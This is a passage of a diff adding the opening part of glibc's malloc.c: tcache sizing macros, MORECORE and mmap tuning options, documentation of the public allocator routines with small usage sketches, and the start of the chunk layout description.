+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
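+
+/*
+  Worked example of the index math above (a sketch, not part of the
+  allocator; assumes the 64-bit defaults SIZE_SZ == 8,
+  MALLOC_ALIGNMENT == 16, MINSIZE == 32):
+
+    #include <assert.h>
+    #include <stddef.h>
+
+    // Stand-alone copy of csize2tidx() under the assumptions above.
+    static size_t tidx_of_chunk (size_t csize)
+    {
+      return (csize - 32 + 16 - 1) / 16;
+    }
+
+    int main (void)
+    {
+      assert (tidx_of_chunk (0x20) == 0);    // serves requests of 0..24 bytes
+      assert (tidx_of_chunk (0x30) == 1);    // serves requests of 25..40 bytes
+      assert (tidx_of_chunk (0x410) == 63);  // last bin with the default tcache_max
+      return 0;
+    }
+*/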
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will,
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
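+
+/*
+  Caller-side sketch (illustrative only): because a failed realloc
+  leaves the original block allocated, the usual pattern is to assign
+  through a temporary instead of overwriting the old pointer.
+
+    #include <stdlib.h>
+
+    // Grow *buf to new_size bytes; returns NULL (and keeps *buf valid)
+    // on failure.  grow(), buf and new_size are hypothetical names.
+    static void *grow (void **buf, size_t new_size)
+    {
+      void *tmp = realloc (*buf, new_size);
+      if (tmp != NULL)
+        *buf = tmp;
+      return tmp;
+    }
+*/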
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
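+
+/*
+  For example, a program that prefers strict best-fit behavior over
+  speed could disable fastbins as described above.  Sketch only, using
+  the public mallopt interface and the M_MXFAST constant defined later
+  in this file (or in malloc.h on systems that expose it):
+
+  if (mallopt (M_MXFAST, 0) != 1)
+    fprintf (stderr, "mallopt(M_MXFAST, 0) was rejected\n");
+*/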
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+             have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
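+
+/*
+  Illustrative sketch of reading a couple of these statistics through
+  the public interface (field meanings as documented above):
+
+  struct mallinfo mi = mallinfo ();
+  printf ("free chunks: %d, free bytes: %d\n", mi.ordblks, mi.fordblks);
+*/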
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
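+
+/*
+  Typical use, sketched: after releasing a large working set, ask the
+  allocator to hand trailing free memory back to the system
+  (release_buffers is a hypothetical application routine):
+
+  release_buffers ();
+  if (malloc_trim (0))
+    puts ("some memory was returned to the system");
+*/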
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
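+
+/*
+  Sketch of the POSIX-style error handling: the result is reported via
+  the return value rather than errno, and the alignment must be a
+  power of two that is also a multiple of sizeof (void *):
+
+  void *p;
+  int err = posix_memalign (&p, 64, 4096);
+  if (err == 0)
+    free (p);
+  else
+    fprintf (stderr, "posix_memalign: %s\n", strerror (err));
+*/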
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
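+
+/* For example, with SIZE_SZ == 8 (a typical 64-bit build) this gives
+   DEFAULT_MXFAST == 64 * 8 / 4 == 128 request bytes, while the 64 in
+   the mallopt table above corresponds to SIZE_SZ == 4.  */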
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set it to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than the page size to have any useful
+  effect.  To disable trimming completely, set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; when handing out mmapped pages the kernel
+  simply has no choice but to zero them.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86; at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upper bound on the threshold satisfies requirement 2).
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
